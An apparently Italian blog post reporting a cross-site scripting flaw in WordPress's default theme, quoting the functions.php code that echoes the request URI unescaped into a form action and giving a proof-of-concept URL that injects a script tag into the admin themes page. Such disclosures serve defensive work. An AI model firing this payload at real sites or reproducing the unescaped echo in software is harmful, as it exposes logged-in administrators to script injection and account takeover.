XSS nel Default Theme di Wordpress

In rete circolano tanti temi per wordpress, molto diversi tra loro ma accomunati comunque da codice possibilmente vulnerabile. A quanto pare sembra sia stata scoperta scoperta una falla XSS nel tema di default di Wordpres.

C’è da dire che funziona solo con l’admin loggato:

.

.

Nome del file functions.php

 

PHP :

 

  1. <p id=“jsForm”> </p>

  2.  

  3. <form style=“display: inline” method=“post” name=“hicolor” id=“hicolor” action=“<?php echo $_SERVER[’REQUEST_URI’]; ?>”>

  4. </form>

$_SERVER[’REQUEST_URI’] echoed all’utente direttamente.

Un exploit è il seguente:

http://www.example.com/wp-admin/themes.php?page=functions.php&zmx”><script>alert(123)</script>

  • Print this article!
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Technotizie
  • FriendFeed
  • IndianPad
  • Live
  • Netvibes
  • Netvouz
  • NewsVine
  • Reddit
  • Segnalo
  • Slashdot
  • StumbleUpon
  • Twitter
  • Yahoo! Bookmarks

Commenti

  1. No Comments su “XSS nel Default Theme di Wordpress”

Inserisci un commento